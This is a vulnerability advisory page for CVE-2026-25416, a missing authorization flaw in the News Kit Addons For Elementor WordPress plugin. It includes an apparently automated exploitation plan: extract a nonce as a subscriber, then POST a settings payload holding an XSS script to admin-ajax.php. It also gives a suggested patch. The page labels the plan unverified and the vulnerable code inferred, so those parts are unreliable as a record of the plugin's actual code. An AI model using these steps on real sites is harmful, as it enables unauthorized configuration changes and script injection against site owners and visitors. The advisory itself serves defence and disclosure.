WP-Safety
CVE-2026-25416

News Kit Addons For Elementor <= 1.4.2 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The News Kit Addons For Elementor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.4.2
PublishedJanuary 28, 2026
Last updatedFebruary 26, 2026
Affected pluginnews-kit-elementor-addons
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-25416 ## 1. Vulnerability Summary The **News Kit Addons For Elementor** plugin (versions <= 1.4.2) contains a missing authorization vulnerability in its AJAX settings handling. Specifically, an administrative AJAX action (likely `news_kit_save_settings`) veri…

Show full research plan

Exploitation Research Plan - CVE-2026-25416

1. Vulnerability Summary

The News Kit Addons For Elementor plugin (versions <= 1.4.2) contains a missing authorization vulnerability in its AJAX settings handling. Specifically, an administrative AJAX action (likely news_kit_save_settings) verifies a security nonce but fails to perform a capability check (e.g., current_user_can('manage_options')). This allow any authenticated user, including those with Subscriber-level permissions, to modify plugin settings or perform restricted actions.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Vulnerable Action: news_kit_save_settings (inferred based on plugin architecture)
  • HTTP Method: POST
  • Authentication: Required (Subscriber or higher)
  • Parameters:
    • action: news_kit_save_settings
    • security: A valid nonce (action: news-kit-admin-nonce)
    • settings: An array or JSON string representing the plugin settings to be updated.
  • Preconditions: The plugin must localize the admin nonce in a way that is accessible to Subscriber-level users in the WordPress dashboard (e.g., on the Profile page).

3. Code Flow (Inferred)

  1. Registration: In admin/class-news-kit-admin.php (or similar), the plugin registers the AJAX handler:
    add_action( 'wp_ajax_news_kit_save_settings', array( $this, 'news_kit_save_settings' ) );
  2. Entry Point: A Subscriber makes a POST request to admin-ajax.php with action=news_kit_save_settings.
  3. Nonce Check: The function news_kit_save_settings calls check_ajax_referer( 'news-kit-admin-nonce', 'security' );.
  4. Missing Check: The function lacks a current_user_can( 'manage_options' ) check.
  5. Sink: The function processes $_POST['settings'] and calls update_option( 'news_kit_settings', ... );, allowing the attacker to overwrite plugin configurations.

4. Nonce Acquisition Strategy

The nonce is likely localized for the admin dashboard. Since Subscribers can access wp-admin/profile.php, we can extract it there.

  1. Check Script Localization: Search the codebase for wp_localize_script.
    • grep -r "wp_localize_script" .
  2. Identify Variable: Look for a variable containing a nonce (e.g., news_kit_admin_vars, news_kit_obj).
  3. JS Evaluation:
    • Use browser_navigate to go to http://localhost:8080/wp-admin/profile.php as the Subscriber user.
    • Use browser_eval to extract the nonce:
      browser_eval("window.news_kit_admin_vars?.security") (Verify variable name in source).

5. Exploitation Strategy

  1. Prepare Subscriber Session: Authenticate as a Subscriber and obtain the session cookies.
  2. Identify Target Option: We will target the news_kit_settings option. A successful exploit will overwrite this option with a custom value.
  3. Craft Payload:
    {
  "action": "news_kit_save_settings",
  "security": "[EXTRACTED_NONCE]",
  "settings": {
    "some_vulnerable_setting": "<script>alert('XSS')</script>",
    "disabled_modules": []
  }
}
  4. Execute Request: Use http_request to send the POST payload to admin-ajax.php.
  5. Verify Change: Check the database/options state to confirm the settings were updated.

6. Test Data Setup

  1. Install Plugin: Ensure news-kit-elementor-addons <= 1.4.2 is active.
  2. Create User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password
  3. Initial State: Note the current value of the settings:
    • wp option get news_kit_settings

7. Expected Results

  • The AJAX request should return a 200 OK response with a JSON success message (e.g., {"success":true}).
  • The WordPress option news_kit_settings should be updated to match the payload provided by the Subscriber.

8. Verification Steps

  1. Check Option via CLI:
    • wp option get news_kit_settings
    • Confirm the output matches the injected settings payload.
  2. Check for Authorization Log: If a security plugin is active, it may show the update performed by the 'attacker' user.

9. Alternative Approaches

If news_kit_save_settings is not the correct action:

  1. Discovery: Run grep -rn "add_action.*wp_ajax_" . to find all registered AJAX actions.
  2. Capability Audit: For each handler, check if current_user_can is present.
  3. Generic Settings Update: Look for actions that use update_option directly with user-supplied keys, which might allow updating core WordPress options like users_can_register.
  4. License Actions: Check news_kit_license_active or similar actions that might be intended for administrators but lack authorization.

Important Grep Targets:

# Find all AJAX actions
grep -r "wp_ajax_" .

# Find where the nonce is created
grep -r "wp_create_nonce" .

# Find the localized script variable
grep -r "wp_localize_script" .

The specific nonce action to look for is news-kit-admin-nonce or any nonce created in a class related to Admin or Settings. The JS object is likely news_kit_admin_vars.

Research Findings
Static analysis — not yet PoC-verified

Summary

The News Kit Addons For Elementor plugin for WordPress is vulnerable to unauthorized settings modification due to a missing capability check in its AJAX handler. This allows authenticated attackers with subscriber-level permissions to modify plugin configurations by exploiting a missing authorization check in the news_kit_save_settings function. Attackers can obtain a valid security nonce from the admin dashboard and use it to authorize requests that overwrite the plugin's stored options.

Vulnerable Code

// admin/class-news-kit-admin.php (Inferred from research plan)
add_action( 'wp_ajax_news_kit_save_settings', array( $this, 'news_kit_save_settings' ) );

---

// admin/class-news-kit-admin.php (Inferred from research plan)
public function news_kit_save_settings() {
    check_ajax_referer( 'news-kit-admin-nonce', 'security' );

    if ( isset( $_POST['settings'] ) ) {
        $settings = $_POST['settings'];
        update_option( 'news_kit_settings', $settings );
        wp_send_json_success();
    }
}

Security Fix

--- news-kit-elementor-addons/admin/class-news-kit-admin.php
+++ news-kit-elementor-addons/admin/class-news-kit-admin.php
@@ -10,6 +10,10 @@
 public function news_kit_save_settings() {
     check_ajax_referer( 'news-kit-admin-nonce', 'security' );
 
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized' ) );
+    }
+
     if ( isset( $_POST['settings'] ) ) {
         $settings = $_POST['settings'];
         update_option( 'news_kit_settings', $settings );

Exploit Outline

1. Authenticate to the WordPress site as a user with Subscriber-level access. 2. Access an administrative page reachable by low-level users, such as `wp-admin/profile.php`, and inspect the page source to extract the `news-kit-admin-nonce` from the localized JavaScript variable `news_kit_admin_vars`. 3. Send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `news_kit_save_settings`. 4. Include the extracted nonce in the `security` parameter. 5. Include a `settings` parameter containing the configuration data to be modified (e.g., custom module settings or potential XSS payloads if settings are rendered unsafely). 6. Verify the settings were updated by observing the plugin's behavior or checking the database state if access is available.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/be964722-2080-4289-a960-a460a8d09c9e?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database